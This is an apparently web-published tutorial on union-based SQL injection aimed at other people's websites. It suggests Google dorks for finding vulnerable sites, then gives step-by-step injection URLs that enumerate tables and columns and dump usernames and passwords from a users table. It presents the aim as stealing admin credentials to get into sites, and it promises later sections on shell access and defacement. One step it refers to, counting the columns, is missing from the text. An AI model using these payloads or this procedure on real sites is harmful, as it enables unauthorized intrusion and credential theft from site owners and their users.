What is SQL Injection ?
SQL injection is a hacking method that hackers use to steal important data, like passwords, from websites vulnerable to SQL attacks. Hackers can find the admin password stored on the website by exploiting SQL.
“The SQL injection method is divided into several types, such as Union-Based, Error-Based, POST, Blind, and MSSQLi.”
Follow these steps to use the SQL injection Union-Based method:
Vulnerable Column → Table → Columns → Data
SQL Injection Procedure:
Step 1: Select an SQL-vulnerable website
First, choose a vulnerable website using a search dork. Some common dorks are:
inurl:index.php?id=
inurl:page.php?id=
inurl:article.php?id=
inurl:news.php?id=
By searching these keywords on Google, you will find several potential sites.
Best penetration testing tools
Vulnerability Check:
After using a dork, you may find many sites, but not all will be vulnerable to SQL injection. So, you need to check if the site is vulnerable. Use the following method:
Add certain symbols after the website’s URL parameter to check for vulnerability. For example, if your selected site is:
www.sqliss.com/news.php?id=2
Then to test for vulnerability, modify the URL like this:
www.sqliss.com/news.php?id=2'
Extracting Vulnerable Columns:
In the previous step, we identified the number of columns. Now, let’s find out which column is vulnerable. We will use this vulnerable column to inject queries and extract the required data.
Query to extract a vulnerable column:
Use the following query:
www.sqliss.com/news.php?id=2'+union+select+1,2,3,4,5,6--+
When you run this query, the vulnerable column number will be displayed on the webpage.
Extracting the Database Tables:
After identifying the vulnerable column, you can use it to extract the website’s database tables. For example, if column 4 is vulnerable, inject the following query:
www.sqliss.com/news.php?id=2'+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where+table_schema=database()--+
This query will display the website’s tables. Next, you’ll need to extract the columns from these tables.
Extracting Columns:
This step is similar to the previous one, but with a small change in the query:
- Replace
group_concat(table_name)
withgroup_concat(column_name)
. - Replace
information_schema.tables
withinformation_schema.columns
.
Query:www.sqliss.com/news.php?id=2'+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_schema=database()--+
This query will show all the columns in the website’s tables. For example, the Users table may include columns like UserName
and Password
. You can now extract data from these columns. This query will display all columns, but you can also modify it to display columns from a specific table.
Printing Data:
In this final step, you will retrieve the usernames and passwords from the website. Use the following query:
www.sqliss.com/news.php?id=2'+union+select+1,2,3,group_concat(Password,0x3a,UserName),5,6+from+users--+
Since the columns contain the data, the webpage will now display the usernames and passwords. With this information, you can access the website.
This was a basic tutorial on SQL injection Union-Based methods. In the final section, we will cover topics like the admin panel, shell access, defacing websites, and creating mirrors.